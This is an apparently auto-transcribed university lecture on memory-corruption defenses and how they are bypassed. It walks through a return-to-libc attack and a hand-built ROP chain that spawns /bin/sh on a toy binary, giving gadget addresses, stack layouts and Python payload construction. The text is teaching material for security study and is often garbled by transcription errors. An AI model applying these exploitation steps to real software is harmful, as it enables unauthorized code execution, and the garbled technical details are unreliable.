 Alright, folks, so we are at the tail end of application in security, so through today we'll learn about modern exploitation techniques, and also modern involvement. We'll learn about modern defenses and modern exploitation techniques, yes. Is there any more homework this time? It's just the project problems. We'll see. We're going to be grounded now. We'll see. We're going to go a little flexible with this thing, depending on how fast we cover things. First up there is Dara. Okay, so we wouldn't get all types of memory correction attacks, right? We've seen, so fundamentally what do we mean when we talk about memory correction? What kind of root, what kind of attacker do on the system or on our process? Yeah, that's one of the, that's a type of memory correction. What is a memory correction? What do we mean together? What's the goal of it? Is that transparent? Yeah. To change the safety at peace when the function returns, calls whatever code you want? Alright, more broadly, right? Generally correction means that we can write, the attacker can write two memory that they shouldn't. Very broadly, right? What we want to do is add and depend on the goals, right? They can change the IP, they can do all kinds of stuff. So, a lot of research over the years on how can we actually prevent these memory correction modernities. Why is this so difficult? What makes this difficult? We need to write to memory, right? The program needs to write to memory. It stores its values in memory, the variables in memory, right? And fundamentally it's difficult to know, hey, is this right to memory good and because the program intended it to happen? Or is it malicious because an attacker is tricking the program to do that? Right? And furthermore, it may be the fact that you can write to a certain location, but if you're able to write a certain value to a location, that's what causes the problem. Right? So fundamentally, even though on the surface that they seem like how buffer overflows are kind of easy to prevent or think about, right? You should check the amount of the buffer before you write to it. Generally, memory correction is incredibly difficult and that's why there still are many buffer overflow type vulnerabilities in the memory correction vulnerabilities today. So the best way to prevent this is to just write programs that don't have these vulnerabilities. Right? Have you ever written a non-blogging program in your life? What was that? Hello world. Hello world? You and I have messed that up. I'll tell you, it literally wasn't, it must have been, I think it was my first or second year here. So what I've been programming for, I don't know, a long time at that point, I wrote like a 20 line Python script and it actually worked for the first time without any bugs, like I was shocked. I actually spent more time looking at the code because I did understand that I didn't believe that it was actually correct. So think about doing that for 20 lines and any sufficiently complicated program is going to be basically essentially impossible to write correctly. Right? So another way is to just say, hey, remember UC or C++, use some other language that completely eliminates this entire class of vulnerabilities. So what do you think? Is this good advice? Is this how we can prevent these? No, it's on the platform. Is that on the platform or on the lab? Well, like, if you need the benefits of C or like if you're programming on Linux, I guess, if you need like the performance, then you can go for C. If you don't, then maybe it's safer to use Java. So it could be for performance reasons that we choose one over the other. Let me check to make sure. I can actually check to make sure that the... Okay, I'm going to check. Okay. So yeah, we can do this if we want slow programs in general, right? So I think we can completely eliminate this problem and move on to Java or Python or Ruby, as well. The interpreters have bugs that allow them to... So what's the JVM written in? C or C++, I don't know. It's about one of the two, right? And so what if there's now a memory correction vulnerability in the JVM itself? Is that a good trade-off? Is that a bad trade-off? Yes, it's a little bit... You're passing the bug to the JVM, right? And so it's a lot... You can say that, hey, just like you don't... You aren't going to worry too much about bugs in the operating system, there always will be some, but you can only control your application code that you can control, right? But I think the counterpoint to this is when you look at browsers, right? Browsers are... Browsers essentially execute JavaScript, right? By design, there's no memory correction vulnerability in JavaScript, but JavaScript programs run in browsers that are interpreted by JavaScript engines, which are written in C++ for performance reasons, and they vary frequently, like, I don't know, a stack, but I think at least once a month would probably be a good baseline. There are vulnerabilities that allow JavaScript executing their browser to execute our memory code on your system, right? And this has been for years this way. So another aspect we can do is say, hey, let's try to find the vulnerabilities before they occur, right? So let's statically analyze the code to try to identify all the vulnerabilities before we execute it. So this is actually a huge area of research and part of, I don't work yet on binary, but this is something that Department of Research tries to do, is automatically find bugs and vulnerabilities in a program. The problem is that... Have you heard of a halting problem? Can somebody restate the halting problem? I really can't say for sure whether or not it's actually going to complete because it's never like... What? You can't say whether or not you're going to find all the bugs in it. What is a halting problem in general? So what does the halting problem say? I think it says that you can't ever determine whether or not a program will finish a terminating on it correctly. Yes, but I'm rephrasing it slightly and saying I need to be able to tell, but you can't write a program that's able to tell if another program will terminate or not on all possible inputs, right? It turns out that you can reduce this problem of finding every single security vulnerability in a program. You can reduce that to the halting problem. And so fundamentally, we cannot write a program that can find all security vulnerabilities in another program. It's fundamentally impossible. So that's probably... That's actually where... If it was easy, then it wouldn't be a fun research area, right? So it's very difficult to actually do this. And so it's all about making trade-offs about it. You're always going to make mistakes in one direction. Either you say there's a vulnerability when there isn't one, or you'll miss a vulnerability. Those are your two questions. So does the halting problem fundamentally fill us that cannot ultimately 100% secure any system? I don't know that the halting problem says that. It's more... I would say... The halting problem basically says you can't write a program to verify another program, right? I think you can... Something that's fundamentally secure is also very difficult to say conclusively, right? So we'll leave that. The other way to prevent is make exploitation harder, right? So the idea is by raising the bar and making it more difficult to exploit, and we'll see what we can do by more difficult here, we can make you prevent kind of your run-of-the-mill attackers. We may still be having those adversary, state-level, funded attackers that can still exploit stuff. The other way to think about this is detective, right? So prevention means, hey, let's stop it from ever happening. So can we ever get 100% prevention? No, there's always going to be some problems. So we also need detection because we need to know when something bad happens. Right? So for detection, we can try to perform checks on the program during an execution. So as it's executing, you can have it try to examine its environment. We can try to analyze the system calls that it's making, essentially go to the profile for each application and see when it's executing weird system calls. You can detect, write, and execute action sequences. So this is really popular in Windows Modelware is to write out to a file and then execute that file. We can do integrity checking. So we can during runtime check maybe the EIP to make sure that the EIP has it in tanner with before we return. So we're going to look at making exploitation more difficult because this is a lot of technical areas here. And so we're going to go kind of semi-historical of how things were developed. So the very first thing people thought of was, hey, part of what makes exploitation really easy is the stack is executable. Right? So you can jump to code on the stack and it'll start executing. Should a normal program ever need to execute something on the stack? What would need to? Does all, let's get a flip that around. Is it true that all programs don't need to execute code on the stack? Let's say it's executable. Like an interpreter might need to start executing some code on the stack, potentially. Close. Interpreter is not quite the right word. What is that? So an interpreter is interpreting the text and executing its own code execution depending on the program. And a compiler is going to generate the code beforehand. There's something that's kind of in between. How does Java get to be so fast? JIT. Yes, it has a just-in-time compiler. So it's interpreting the byte code, but when it notices a sequence that's being executed over and over, it compiles it to x86 code and then executes it. So fundamentally, a JIT engine has to take some data into it and then execute it. So interpreters basically find distinctions in that. So you can't just mandate this for every single program because there are some programs that actually need this functionality. But we can at least make it the default on the compiler to compile the code with this non-example stack. In that way, we can make sure that this technique is applied to all possible, the widest array of programs. And if your program needs to disable this, it's going to be the same, which is how we compile all of the levels, basically, for this challenge. So how is this actually done? On Linux, there is an NX bit, so the kernel uses this physical address extension, PAE mode, and basically the NX bit executes a region of memory as non-executable. So in this way, it's able to say, hey, this memory region is not executable. There's other names for this technology. DP is Microsoft's implementation, so it's data execution prevention, so preventing data from being executed. It actually will support it in hardware, so if the hardware supports this non-executive bit, it will do it. Otherwise, it will emulate it using software, which will obviously be slower. Kind of the first implementation of this was this write or XOR execute. So exclusive or you can either write to memory or you can execute memory, but you can never do both at the same time. This is a little bit... So you can see the naming scheme, the nerd year, like OpenBSD shows this. Really, how do you name for this? So basically, you never have memory that's both writeable and executable at the same time. But as we just talked about, if you need to write a jit, fundamentally, you need to do this. You need to write out some bytes and then you need to execute those bytes, which actually makes sense now when we talk about, well, this is how a lot of the... how JavaScript is able to break out in the browser as JVVM, because it's actually, literally, the JavaScript code is being compiled into XA86 code, and then using some exploits, it's able to change control flow of the application to get it to execute in its little code segment. So there's a couple of different ways you can do this. So, how does this change? So let's assume that the stack is no longer executable. How does our classic buffer overflow attack change? We can't put our shell through on the stack anymore. Why? Not executable. Not executable. How's the stack fall? Can we put it in the environment? No, it's also not on the stack. Can we put it in the heap? No, we didn't talk about it. It's also going to be not executable. You don't need your heap to be executable. Right? So the question is, what do we do? Are we dead in the water? Are we not doing anything? I'm going to write the global offset table somewhere you might want to go. But where do we want to go? C function, or libc function? Ah, so, the key thing is now we can no longer put our own code into the program. Essentially our shell code, if we try to inject it into the program, anywhere we can write it into the program, it doesn't do anything. It can't be executed. So the idea is, but there's actually a lot of functionality that's exposed to the application. So why don't we try to reuse some library function or something? So that's where we get into this. It's called this basic technique called return into libc. So what's a good, what's a libc function that we might want to target? So let's think about this. What would our shell code want to do? Run bin sh. Run bin sh. What are some of the library commands? Yeah, there's a system command, which you didn't, I've forgotten that. What is that? A sign of one? A sign of bin seems like forever ago. A sign of one. So a system command is a libc function that impacts into string and it executes some program. So what if we're able to call system with the argument slash bin slash sh? So essentially what we're going to do we're still going to use a buffer overflow, we're going to overwrite the stack. But now that address that we jumped to is going to be the function system and we're going to set up the stack in such a way that system thinks it was called with the argument slash bin slash sh. Essentially we're setting up a fake call frame for system. And any function that's currently linked into the program we can execute. So this is actually a nice technique if the program itself offers this functionality or has something that we want. We can jump essentially remember by controlling that EIP we can jump to any function in the program that we want. And controlling the stack we can pass it any arguments that we want. So we often want system. One thing we can do if there is some section of memory that is executable, we can actually string copy and copy our shell code there, which is cool. What area is typically other than the stack to be executable? If the program I honestly don't know, you'd have to look at the segments of memory if that program said it needed some. One thing you can do is you can copy the shell code and then there's other library functions of that page so you can say this memory page is now executable and then you jump to it. So you can do cool stuff like that. But we first need to find the system address in memory. So we can use debugger, we can use PROC. So we'll look at this, we'll still use this same simple program, right? So we have our program made we're copying rv1 onto the buffer foo and then returning 10. So we've already seen all this so we're not going to go over this. We can compile it with this but you will not notice, but I will tell you that there's an option for non-executable stack that's now gone. So if you compare this to the commands that we used before you'll see that now we no longer have an executable stack. And you can tell by using the readout command to tell you all the sections. So here it would tell us that let's see the stack is only readable and writable so it is not executable. So here you don't have any writable and executable so here you wouldn't have anywhere to do that. So we've now compiled this program without a new binary the stack is not executable we can run it, we'll set a breakpoint on main we'll run it with some foo parameter and then we'll print out. So remember when the program loads right the program loads and then the dynamic linker is going to load the libc library into memory so you can print out what's the address of system using the debugger and they'll say it's at b7, e66, 310 and I think when we go back we should see lib, loadlinux I think one of these is reading this read out okay okay so if you do info inferior sorry I didn't properly do the new lines we can see that we're process id 14077 so this is telling you what the process id is that's currently being executed this is how we go to ai out and then, so actually this is a cool thing inside gdb if you put the exclamation point before the line it will execute this as if it was on the shell so here this will cat out slash proc slash 14077 slash maps so the file system that we talk about it gives you information about the process so here the maps shows you the memory mapping that we'll see and it says that home mu2a.out is mapped at memory region 0848 to 08049 and it's readable not writeable but it's executable and it shows you that this section of home mu2a.out is at 08049 to 08048 and this is only readable and so on and so forth so it has all of the sections so what's the difference between this and the self information this is loaded with all the libraries so this is the actual running process so this is the memory layout of the process you do this to inspect any process that's running as your user that you have operations to and so we can see in here we have we have the libc.so file so this is where libc is being loaded and we can see in here that this section is readable and executable and this should be b7e66310 should fall within that range and we can actually see there's other stuff there's a loader that gets loaded somewhere else so we have all kinds of cool stuff so we have now the address of system so if we override samepip with this address with b7e66310 the start of the printf function will start executing I'm sorry printf but what we want to pass into we want to pass in bnsh so how do we get bnsh into the program with our shellcode so we can put it into an environment variable we can put it into an argument but then we have to know exactly where that location is in memory right and if we're already relying on the fact that system is at this fixed offset why don't we try to fight actually so it turns out I would never have guessed this a million years and I still don't know why but bnsh is actually located in libc so there's this string slash bin slash s a zero in libc so this is actually a super cool in gdb command to search for bytes so you first give it the first offset you want to look for this b7e26 which is going to be in this this segment here and you'll find that in my case in a b7 f868 for c is the string bin sh and this is true for a lot of versions of libc I still don't know why I'll look it up in some way and so we can print out we can print out the string at that memory location it'll tell us yeah bin sh is there so we actually already have all the ingredients we need we have system loaded at this location and we have now the string bin sh so let's call system so now we're going to run this so just like before remember we have 50 bytes in the buffer so we have 50 bytes of a's then we have the safety bp and now we want to go to the address of system which was b7e6 6 3 10 but we want it as an argument to be b7f868 for c so this should be the argument to system so that should be the string bin sh so let's see so I basically set a break point here on this call so right before the call this is what the stack looks like after the call we've overwritten our buffer with 50 a's we've overwritten safety bp with 65646362 we've overwritten the same eip with the address b7 6 8 6 3 10 and then we overwritten above that with b7f868 for c so let's go check and make sure this is right so b7e6 3 10 is the address of system and 8 47 is the string 8 47 and 3 10 so let's walk through this step by step so we know exactly what's going to happen here we're going to move 10 into ex now that I've removed this so much I wish I would have removed that part so when we leave we're going to set the base sorry the stack pointer to the base pointer and then we're going to cop eip so that's going to change the stack to the up here it's going to put 6564 6362 into eip now we're going to return which is what we wanted where we're going to return to add some system so system has a bunch of bytes it's going to start executing it's going to push eip and we're just going to go and if we continue it's going to tell us that there's a syntax error there's an end of file and back quote substitution and then it's going to say that it received a segmentation fault here at b7f868 4d so why what's the problem here no we're going to look at the string it has we looked at it in gd we said x slash s so it's printing it out as if it wasn't here you take those strings up and it's back you're not going to do that is it when the system is turning back to where it was called no we should have seen a shell first if the system was correctly called so these are all the things I thought of because I did it like this and I got to this error after making all these slides and then I had to figure out what went wrong so I put these all on my shoes and then I said I'll keep these and use it as a teaching moment wait, did it again do you need some arguments that have slash min slash sh then no that's what we're calling execbe here's system is a function that just takes in a character pointer so we know from here we actually got to the address of system we started executing the system function is there base system sets up its own base pointer we overflow something and check all the memory nope put yourself in the system perspective so let's completely get rid of everything below the line below the arrow what a function is called right when the system is called what should be exactly at the stack pointer what was it save DIP because when you call a function right before you call a function what does it look like argument zero because we're going to push the arguments on from right to left so argument zero will be exactly at the stack pointer then we say call system the call function will push the return value onto the stack and save DIP so according to system right now this is the stack as it looks like according to system what's argument zero to system BFFF714 exactly right so we and what system thinks is the same DIP is B7F8 it's eight four C so this is exactly the problem so when we look at it here according to system this is save DIP and this is argument zero so we need to what is it actually it's not really important what it is but it's important that we pass the wrong argument to the system so we got to think this is where it comes into creating a fake function frame right we want to create a function we're not only want to overwrite the address the save DIP with the address of system we want to create the stack that when system starts executing it thinks it was called with the argument of bin SH right so to get this arg zero we need to have four more bytes in between our the overwrite of the address of system then four bytes and then slash bin slash SH that's where we're going to try here we'll do BCBE we'll do the address of system then EDCB and then now the address of bin SH so that it'll finally work and if we look at why we'll look at the stack here and we'll see that after the call we've over in save DIP we've over in the save EIP and then above that is what system thinks is its save DIP so actually like you said after system is done executing it's going to go and start trying to execute from 6263 6465 which shouldn't crash the program but at that point we've already got shell so we don't care what system returns and then above that is arg zero and if there are any more arguments to system those would go above that so here when we get to system we have save DIP and arg zero and using this technique so this is the return to live C so essentially by creating this function frame on the stack we're able to completely control the argument second pass to a function and not only that as we just said when system returns the next thing that will start being executed is that 6263 6465 and so if there's another function we want to call we can put that address there and that function will be executed after so if we do this in a clever way we can chain multiple functions together but you need to be very careful with how the stack looks so even this completely getting around non-executable stack so have we fixed so does a non-executable fix solve buffer overflows and memory crafting more abilities no I hope not because I just showed you one that worked on it but what did I have to know in order for this attack to be successful I needed to know where the address of system was and the address of the SH so that led to essentially the next evolution in defenses people said aha if you have to guess my memory addresses well I'm going to randomize them every time I execute so so address space layout organization the short version is ASLR I'll never use the long version again randomizes the position of the heap the stack the programs code no depends on the system I think on Windows it may but it also does dynamically link libraries so it moves around all like libc so every time you're on the program libc will be in a different location but if you're if you're moving around the library you need to compile that library so it can be relocatable so there are no fixed addresses in there and so not every library will use ASLR so some libraries will exist at fixed location which can be all the way around ASLR so this basically prevents return to libc incredibly difficult because the library code needs to be guessed but how do we get around this brute force so one question is depending on the implementation how much entropy actually is there right and so actually on 32 bit you can pretty much get around ASLR pretty easily you can do it in 32,000 attempts you're likely to get it correct so that's pretty cool right so it can still be vulnerable 64 bit is much more secure you have an incredible amount the address space is much larger so you can move code around but this is always one of the things you should try to think about right if you can't guess it or if you can't break it just guess as an attacker fundamentally you only need to be right once or if the defender needs to make sure you're being correct every single time what's another way to break it what does the whole scheme rely on so if there's a problem in the way that OS was generating that number like maybe you're on the same system and you're using the same source of entropy or a bad source of entropy let's say the random number generator is great the random number generator will move around moving around but let's say it's got all that how do we find memory corruption more ability what can the attacker do with the memory corruption in more ability overwrite so they can write to memory what do printf allows to do read read from memory so now let's say you've randomized everything now if I use a printf vulnerability to start reading from the stack everything on there is a pointer to some place in memory so with that and those will be at fixed fixed offsets so no matter where you move it around it will be some each pointer on the stack will point to some fixed offsets let's say somewhere at the stack you have a pointer into libc all I need to do is read that pointer and now I know exactly where your whole libc is located and then I can do a really easy return to libc attack so this actually as an SLR gets more popular it increases the significance of these what do they call which I'm linking on memory I'll say dumping memory leaks like leaking memory addresses becomes much more severe and the previous part is not really that severe it must be sensitive data but here literally every single pointer in memory is sensitive because leaking one of those pointers can tell you where all of the code is located and brain data is located SLR Linux is enabled by default there's a setting that you can use to control it based on runtime so there's stack, library so this is one thing so by default the stack will be randomized and all of the libraries will be randomized the code will not be randomized by default so you can either disable this while you're testing things you can't do this on my system obviously change this thing this is why I actually created a wrapper for levels 5 through 9 so they are I don't know which one is actually about that I think it's fine enough to use this wrapper which disables SLR just for that program I was slightly worried about you guys finding like there being some stewarding, vulnerability, some second ID thing and then you becoming rude I figured to make that more difficult I'm enabling SLR for the whole system just as they went through these binaries so yeah, address leaking so we think with this we've solved we've made buffer overflow exploit significantly more difficult we've made libc significantly more difficult it makes sense everything's moving so how can you possibly jump to southern node and this was probably one of those paper release sorry, I forgot about the paper oh I don't have it so it turns out that we can actually generalize this return to libc approach so return to libc started executing at the start of each function it would execute the whole behavior of that function it turns out that A often times the binary the code itself is not randomized at all, it's at a fixed location just as we saw in most of that whole file it's going to execute at a fixed location so the code of the application itself is not randomized but that seems like it doesn't help us because the code of the application doesn't call system or call exact DE with whatever arguments we want but it turns out we can completely generalize this approach and we can use little, what we call gadgets that do one thing and then return so for instance that will pop evp and then return or that will increment one to ex as we'll see so the idea is instead of executing with libc entire functions let's just find super tiny functionality that we can use that are followed by a return instruction of 2005 there you go so actually for a long time people kind of thought that this problem was solved essentially that hey, buffer overflows or a thing in the past we're moving on to other vulnerabilities and then we did SLR we did non-executable stack boom, there's no way around those and then around 2004-2005 time frame before that started to change so this paper if you want to get super into rock is really good the geometry of the innocent flesh on the bone, return into libc without function calls yeah have metadata? no I don't believe so I think the OS, the OS handles everything so without bringing the OS you can't know any of the offsets and similarly if the process is running like we saw the PROCS the PROC class system if the PROC class system is running on is running as a second ID program you can't access it so you wouldn't be able to see that okay, so we'll look at this so let's look back at our fancy NIMI nice libc program, still the same code still the same everything but now we're going to compile it with actually the only thing on here that we'll talk about later is FNOS stack protector every one of these has nothing to do with security so the preferred stack boundary just means there's actually 50 bytes instead of some more stuff here but what does this static do? what's that static line? does that have anything to do with security? yeah so we can pile the libraries in statically so we're no longer using the dynamic libraries and we can see that it made it a lot bigger for this simple file is now 716,000 bytes this actually happens a lot or you can say we're simulating a very large program with this with this what we want to do here but we've gotten rid of all the other security provisions around here so we need to find some gadgets in the binary that will perform some different actions and what we want to do is essentially encode our shellcode into these little gadgets right? what does our shellcode want to call? call what function? what does it want to call to say what happens? no no no system as a return of the c and zecve we want to call it zecve which is a syscall so how do we have to do that? we need to put 11 in eax what else? we need to call it av eventually at the end we need to put the slash bin sh in evx a pointer to the bin sh and then null in ev not ecx and then what of evx? either null or a pointer to null whatever we can do in edx then we call it 80 so the idea is we're going to find little gadgets we're going to use them together to accomplish the same thing and essentially encode our shellcode into these gadgets so what do we need? well like we said 11 in eax the address of bin sh and evx the address of an array of the address of slash bin sh null and ecx null and evx question is where can we put bin sh now we cannot rely on bin sh to be in a fixed location so let's say we can we can write somewhere where do we actually put bin sh can we write it onto the stack? let's say we can write to any fixed address can we write it onto the stack? we can't write it onto the stack so we need to find some other place to put it so we can use readout to look at all the locations here and we can see that there's a lot but we can see that hey the .data segment that holds the writeable data of the program is a at a fixed memory location and we know this because we know the code is fixed and it references directly the code that's in .data so both of these are fixed and don't change with ASLR and we can see that starting at OAOEA060 is what's the size? F20 which is a lot of writeable data that we can write to and we know that this one will be fixed this memory location is fixed so if we write the string bin sh there we're going to be good so we need to find a gadget the first thing we need is to write something to an address gadget so we'll search and we'll see how to do this later you can actually choose a graph or whatever other cool stuff you want to use we find that in the program at 809A67D we're going to write edx into where the location pointed to by edx is a dereference so we're moving whatever's in edx to whatever edx points to and then we return so all we need is these 3 bytes somewhere in executable memory so this gadget will copy whatever's in edx into the memory location that edx points to so we're going to use this as our first so as long as we can control eax and edx we can put the string slash bin into wherever .data was and then start executing this gadget and it will write slash bin at that memory location then we do it again and set up eax with slash slash sh and edx has the next 4 bytes so .data plus 4 and it will write slash slash then it will write a 0 but we can use this as functionally a write something somewhere but we need more gadgets we need to be able to control eax and edx so we can search some more so we can find that there's a pop edx gadget so at 806E91A there's pop edx followed by return so this gadget will take whatever's in the top of the set and put it into edx how does this help us, why does this help us we control the stack we control the stack fundamentally we're overwriting the stack we're going to overwrite say VIP and using that we can also put data on the stack that will end up in the edx register so we can test this out we'll just test this one gadget so we're putting the address we want to go to as 06E91A and so what value do you think is going to end up inside edx when that gadget executes so afterwards the stack looks like this we have 50As we have 65G46362 we have our same VIP that we've overwritten and above that we have 62636465 so this is where we're going to execute so we're going to step through we leave, we return and now we're executing here so now what's going to happen what's going to go into edx 656636465 essentially whatever was right above that gadget on the stack if we go back to our rock payload that we generated we can see here is the address of popp.exe and whatever was after this got copied into edx by that gadget so after this is done, after it pops then what are we going to return to what's the next thing that's going to happen it's not a mutation fault so let's try to execute a bfff700 it's going to air out but here we can see that by putting the value on the stack as part of our exploit we can as part of our stack overwrite that that gadget will copy whatever is above it on the stack and put that into edx so we can use this as a building block so we have this popp.exe return gadget onto the stack but we need to not only control edx we need to control what else edx we also need to control what ecx edx all of them a3d all of those registers so we'll find a popp.exe return at edb6d6 a popp.edbx return at 80481c9 popp.ecx an x or eax or eax why is this important zero out eax which is nice we could use a popp.exe but then what would that mean we'd have to have on the stack we have to have zero as part of our popp payload which as we've seen is problematic so we want to avoid them whenever we can right and then we found an increment eax return at this location and we can easily find an in80 so there's an in80 at this member location this is actually everything we need in order to do I think almost any arbitrary computation but that's essentially what this paper showed you have a term in complete language and you can create a rock payload to do anything and they're arguing it was hey as programmers get more and more as programmers get bigger they'll have more and more gadgets and there's more things that you can actually do so we're going to build our rock payload so we're going to build our shellcode and encode it as a rock payload and it's called usually rock change I don't know about you but doing it like this with a little ending in this you're going to kill me so you have a little ending in all those things all the data selects a right in the Python script so it's nice there and b we can actually do it in the correct order so I'll show you how to do this the struct module is your absolute friend when you're doing this there's a pack function that tells you how to turn the integer and pack it as either a little ending or a big ending so that we can use this function and actually have readable, very cool looking we're not cool looking numbers that actually make sense based on what we want to do so we're going to start our payload by creating this object p and remember we're trying to conceptualize this so we first want to copy the bytes slash b i n 2 dot data so p is going to be the payload we know we first need 50 a's and then a save EGP to get to the save EIP so what do we have to do next our goal is to copy the bytes slash b i n to dot data what do we need to do what should be in edx address of data the address of data what should be in edx slash bit and then we call that gadget that writes into edx and then we do other stuff so we're going to build up our rock payload so this is how we use the pack function I honestly can't remember the first parameters like a format parameter it allows you to specify there's different formats I think it's the angle bracket that tells it a little ending and then the i I think tells it that's a 32 bit which should be 32 bit like 4 bytes so it's going to turn this integer for us so this is going to be an 0806E91A we're going to pop edx and then return so this means what needs to be the next value in our rock payload address of data whatever we put next is going into edx so we'll put the address of data next and then we want which gadget can we write now what are we going to return to what gadget do we want to execute next pop edx so we want to pop edx and return and we want to put the string slash bin into edx and now we want to go to our right gadget right what where so when this gadget executes it will move the bytes slash bin at the address of the data so when those four execute we've now copied those bytes there are we done? no we need to copy slash slash to at data plus four y plus four after we've already put four bytes there we want to overwrite those bytes so we want to start at plus four and we don't want to include a zero in our rock payload so we don't do slash sh null because that would have to be inside of our string so now we'll do and we have to do this for everything so we're going to pop edx and the important thing here is that the address is the address here is six zero so this is four bytes in front we're going to copy pop edx slash slash sh then we're going to call that gadget and so now we've moved there so now we have the string at the address of the data slash bin slash slash sh next what do we need to do zero we need to make sure it's null terminated right so we need to copy null bytes at what exact address in relation to .data .data plus eight there we go so we'll actually get so this is zero six eight so this is eight bytes above .data then we're going to XOR now we go to our XOR gadgets we're going to XOR edx zero that out and now we're going to go after that to the gadget of move edx and the edx this will move zero into 080 EA zero six eight so now we have eight bytes of our dat string a null terminated string are we done no we still don't know other stuff we have to set up RV and the environment wire so now we know right we have the string bin sh at fixed location and memory that will never change drive executions in this program no matter what the our status is so at 0808 060 so we're going to build the RV vector where should we put it we don't know what's in edx we don't have any access to get edx we only have popping into things and popping into things we may if we had one made it would be bad bin sh is not data so we have eight bytes of our string four bytes of zero so starting at data plus 12 is free so we can put but what do we need to put there yes so we need to put the value 0808 060 and then is that it what do we have to do after that we're going to put zero afterwards we're going to make sure we know that zero afterwards so same thing we're going to put 060 so we have data plus 12 into there we're going to pop 080 0808 060 into not data sorry not into not data into edx so this value is going to go into edx then we're going to write out at 08080 060 we're going to write the value 080 080 060 now we can add the null so we're going to do the same thing to add null to data plus 16 if you're really clungery you can move these around so you can reuse the fact that we were null that eax was null at that other right but you're doing it by hand you want to make sure that this stuff is precise are we done? what do we need to do next? set up the environment so for the environment we can actually have two choices we can actually use the address of whichever one was null so there we can clean that out so that's what we have to do yes where does that go? no not quite that would be a terrible pointer we need to put that in edx yes we need to put that address in edx so now we need to set up our call to execve so now we have all the data in memory everything's all set up at fixed memory locations now we can call execve so remember we want to call execve with the address of our data plus 12 and the address of data plus 8 so plus 8 is going to point to that in 0 so it's going to be an environment pointer that's null edx is the first argument to execve e so we need to do a pop edx gadget which is going to put oa0a060 into edx ecx is going to be the next one so we use our pop ecx gadget and we're going to put the address of data plus c into there edx is the third argument this is an environment pointer so we're going to put 0 0 6 8 or address of data plus 8 and then eax needs to be 11 so how are we going to do that zero it up and then do what increments in 11 times you could maybe try to search for a gadget that like moves 11 there you could try to do whatever you could keep doing this as much as you want but we'll be 11 as long as there's no restrictions on your input that's one of the things you need to think about now we're going to call it an 80 and then we're going to print out our payload this is going to be our payload to our program actually even though I mean it's tedious but it's still roughly on the order of writing in our shellcode it's not super crazy so now we can run this or maybe somebody was really remembering what's the difference but I did decide to change the program that's being executed between this and the other ones double quotes double quotes why do I need that yeah because this shellcode not the shellcode because this payload has white space characters like a horizontal tab in it and so if you do it without double quotes it'll work but it'll pass multiple arguments and completely mess things up that took me like a half hour to figure out what's wrong so don't I get stuck on these things too I present it to you like this is just how it is but I struggle with this stuff too so double quotes are super important and super necessary here literally this example will not work but we're going to want to set our breakpoint at a location right in front of the lead so you can see we've over in the stack come right before the lead so I'm not even showing any good marks in the stack right we've already done our overflow and we're going to walk through this very quickly so we're going to return so now we're going to start executing from our gadget so these are all the different gadgets in memory they obviously are not next to each other and literally we're going to have space to separate them it's wonderful okay so we're going to pop edx we're going to put a 060 in there we're going to return to a gadget that pops edx we're going to put this value to edx so this now is slashbin we are then going to copy that value at this memory address 060 and if you're wondering yes it was just as tedious for me to make these slides as it is for you to watch them but I think it's important to actually understand the flow of what's going on here and how the relation is between that code that we created and what's actually going on here so now we're going to write out this would be slash slash sh so we can actually see maybe we're starting to decode that x to f is slash so this is slash slash sh we're going to move that there then we're going to pop the next value at 6.8 and we're going to x over edx so we're going to zero that out at address of data plus 8 then we're going to return and now we're going to pop that into edx so we still have a ton more to go but it's actually not that large think about it, it's like 40 steps but for arbitrary computation with this it's pretty cool so now we're returning here to copy edx now we are moving so this is the important part this is where we're setting up the rv factor we're copying 080 080 060 26C so we're setting up our stack correctly pop in there x over edx now we're zeroing that out so we just here move 0 to 070 which is 16 bytes plus data and now we've got all our fun stuff so now we've popped edx so now we're setting up edx we've returned we're copying ecx and we've returned and now we've popped edx so now three of our registers edx, ecx, edx are all set up with the values that we want edx points to the string than sh ecx points to a pointer points to a memory location at that memory location is the address of the string than sh followed by 0 the primary pointer just points to an old pointer now we're xoring edx then we've got 11 increment instructions which trust me we'll get it up to 11 we get up to here on the stack we then return from there to 80, we call this and we're trying to get a shell so we can actually see that before we actually get this shell at the same 80 we can see that after memory location is the string min slash slash sh it's important that we know that it's no terminated because gdv is checking for that I'm going to print out the string we can look at o8, oe, a 0, 6, c we can look for two values and we'll see that at this memory location because this is erv pointer we can see that there is a pointer to this there's the memory address of the ns8 followed by 0, at this is 0 we can continue and we'll actually execute a new program so we've essentially done exact ve with this string this argument vector and it's null environment actually technically this is an array command or an empty array or whatever so this is a rock payload for this program that is fully aslr proof it doesn't matter how much aslr is inside this program we will be able to execute any arbitrary computation and any array commands from here there's an important point you may think that we could skip this rv and make it null but that was a an optional step and I'll tell you we were doing a capture of flying competition I think it was definitely on quals and I've been working on this program for like three or four hours and I got to the point where I was doing a rock payload and I was working on the course of my machine like you were just doing gdv I had to write it on their system and it wouldn't work and I was literally pulling my hair out I think it took me another two hours to realize I was passing null as the second argument which would work it would be no argument vectors but on that particular operating system if vnsh was executed with no rv branders it would terminate and so when I changed it to be something like this it took more work it actually worked so this is why I'm doing this doing it another way question about this yeah is there a reason .data isn't controlled by ASLR why it doesn't actually randomize data yeah I believe it's because the code segment is not randomized and the code segment has to is using the .data segment as global variable so any global variable you have will be located in the .data segment so when you need to reference it in the code you need to reference the full address that's probably not worth targeting is the short version you may be able to do something with the gadgets that are there so it would take you looking at the gadgets by hand and trying to figure it out so to lift your spirits there are automated tools to find the gadgets so you don't actually have to do it by hand to be fully honest that's how I made this example I ran this tool on it I put it into the gadgets and I saved home tools so if you want to look at the library and do this stuff competitively home tools is a fantastic library that has all kinds of cool payload generation rock gadget finding tools all kinds of super cool stuff almost all of the top CTF teams use home tools to render exploits rock gadget is the tool that I use which is really good for finding gadgets so it will show you all the gadgets in the program so you can look to see what's useful so definitely rock gadget has it I think home tools may have it too is they will automatically build the rock chain for you so they will analyze all the gadgets, try to find a right what where gadget and then try to find those right pops and stuff and create the whole thing for you automatically so super cool so is this it? are we done? should we just give up? time to go home we can't possibly stop these meta correction attacks the attackers are just too smart what made this attack possible? part of it, yeah your input could be as long as you want as long as you want to do what why would I need my input to be really long what was the first dominant on that whole chain save EIP still fundamentally I act up overflow save EIP so an idea is hey let's try to prevent overflowing save EIP so one way is canaries so canaries were an older technique with the idea was hey let's put something on the stack before save EIP and then we'll check it before the function returns and make sure that that canary body is still there but it's not returning so stack guard is the way to do that there's all kinds of different canaries and the idea is the compiler changes the epilogue so that every time a return construction is performed it checks the canary and makes sure that the canary is valid so it needs to be re-compiled so it doesn't work on old code and it introduces overhead which means some people don't actually use them so f stack protector and f no stack protector these are the ones that enable or disable canaries on 